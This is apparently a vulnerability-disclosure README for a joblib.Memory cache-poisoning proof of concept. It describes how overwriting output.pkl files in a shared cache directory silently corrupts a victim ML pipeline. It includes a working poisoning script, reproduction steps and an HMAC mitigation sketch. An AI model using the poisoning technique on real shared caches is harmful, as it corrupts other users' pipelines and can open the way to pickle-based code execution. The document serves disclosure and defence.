Joblib Cache Poisoning Proof-of-Concept
Overview
This repository demonstrates a security vulnerability in joblib.Memory: cached ML artifacts can be silently modified because no integrity verification is performed on them.
An attacker with write access to a shared cache directory can tamper with the serialized .pkl artifacts, and the victim pipeline then silently loads corrupted outputs on subsequent runs.
Vulnerability Summary
- Type: ML Cache Integrity Bypass / Deserialization Trust Issue
- Library: joblib (Memory caching system)
- Impact: Silent corruption of ML pipeline outputs
- Root Cause: No integrity validation on cached pickle artifacts
Attack Scenario
In shared or multi-tenant environments:
- joblib caches function outputs as .pkl files
- Cache files are stored at deterministic filesystem paths (see the sketch after this list)
- Attacker modifies cached artifacts directly
- Victim re-executes function and receives corrupted output
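The precondition is nothing more exotic than a joblib.Memory instance pointed at a writable shared directory. The sketch below is a minimal, hypothetical pipeline (the actual poc/victim.py may differ); it shows how a cached function's return value ends up as a pickle file at a predictable location under the cache root:

```python
# Minimal sketch of a joblib-cached pipeline (hypothetical; the real poc/victim.py may differ).
import numpy as np
from joblib import Memory

# Shared, writable cache location -- the attack surface described above.
memory = Memory(location="shared_cache", verbose=0)

@memory.cache
def extract_features(n):
    # Stand-in for an expensive feature-extraction step.
    return np.arange(1, n + 1, dtype=float)

if __name__ == "__main__":
    # The first call computes the result and writes it as a pickle, roughly at
    # shared_cache/joblib/<module>/extract_features/<args-hash>/output.pkl;
    # later calls with the same arguments load that file instead of re-computing.
    print(extract_features(3))  # -> [1. 2. 3.]
```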
Repository Structure
joblib-cache-poc/
│
├── poc/
│   ├── victim.py        # normal ML pipeline using joblib.Memory
│   └── attacker.py      # cache poisoning script
│
├── shared_cache/        # generated cache directory (optional)
│
├── Report.md            # full vulnerability analysis
└── README.md
Reproduction Steps
1. Run victim pipeline
python poc/victim.py
Expected output:
[1. 2. 3.]
2. Run attacker cache poisoning
python poc/attacker.py
This modifies the cached .pkl artifact in the shared cache directory (a sketch of the idea appears below).
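In practice, "modifying the cached artifact" is just overwriting bytes on disk. A minimal sketch of such a poisoning script, assuming the cache root is shared_cache/ and that joblib keeps each result as an output.pkl file (the real poc/attacker.py may differ):

```python
# Sketch of the poisoning step (hypothetical; the real poc/attacker.py may differ).
import pickle
from pathlib import Path

CACHE_ROOT = Path("shared_cache")  # assumed shared, attacker-writable location

# joblib stores each cached result as an output.pkl file under a deterministic
# per-function / per-arguments directory, so write access is all that is needed
# to find and replace it.
for artifact in CACHE_ROOT.rglob("output.pkl"):
    poisoned = ["CORRUPTED_FEATURE_VECTOR", [999, 999, 999]]
    artifact.write_bytes(pickle.dumps(poisoned))
    print(f"poisoned {artifact}")
```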
3. Re-run victim pipeline
python poc/victim.py
Observed output:
['CORRUPTED_FEATURE_VECTOR', [999, 999, 999]]
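The corrupted value is simply read back from disk: joblib deserializes whatever bytes it finds in the cached output.pkl, with no checksum or signature to compare against. A small illustration of that load path (paths are whatever the cache happens to contain):

```python
import glob
import joblib

# Every output.pkl under the shared cache is deserialized verbatim; nothing
# distinguishes bytes written by joblib from bytes written by an attacker.
for artifact in glob.glob("shared_cache/**/output.pkl", recursive=True):
    print(artifact, "->", joblib.load(artifact))
```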
Security Impact
- Silent corruption of ML outputs
- Cross-process cache contamination
- Broken trust boundary between filesystem and ML execution
- No runtime error or warning generated
Affected Component
- joblib.Memory
- joblib.numpy_pickle._unpickle
- joblib.store_backend.load_item
- Python pickle deserialization layer
Mitigation
- Add cryptographic integrity checks (HMAC/signatures) for cache artifacts (see the sketch after this list)
- Isolate cache per user/process
- Avoid shared writable cache directories
- Replace raw pickle usage in shared environments
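As an illustration of the first mitigation, the cache consumer can sign every artifact it writes and verify the tag before unpickling. The sketch below is a standalone example using a detached HMAC-SHA256 sidecar file; it is not a joblib API, and the helper names are hypothetical:

```python
# Sketch of an HMAC integrity layer over cached artifacts (illustrative only;
# joblib does not provide this; helper names are hypothetical).
import hashlib
import hmac
import pickle
from pathlib import Path

SECRET_KEY = b"per-deployment-secret"  # must live outside the shared cache

def sign_artifact(path: Path) -> None:
    # Write a detached MAC next to the cached pickle right after it is created.
    tag = hmac.new(SECRET_KEY, path.read_bytes(), hashlib.sha256).hexdigest()
    path.with_name(path.name + ".hmac").write_text(tag)

def load_verified(path: Path):
    # Refuse to deserialize anything whose MAC does not match.
    expected = path.with_name(path.name + ".hmac").read_text()
    actual = hmac.new(SECRET_KEY, path.read_bytes(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, actual):
        raise RuntimeError(f"cache artifact tampered with: {path}")
    with path.open("rb") as f:
        return pickle.load(f)
```

sign_artifact would be called right after a new cache entry is written, and load_verified used in place of a direct pickle load; an attacker without the key cannot produce a valid tag for modified bytes.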
Author
Nguyen Duc Canh (canhnguyen26)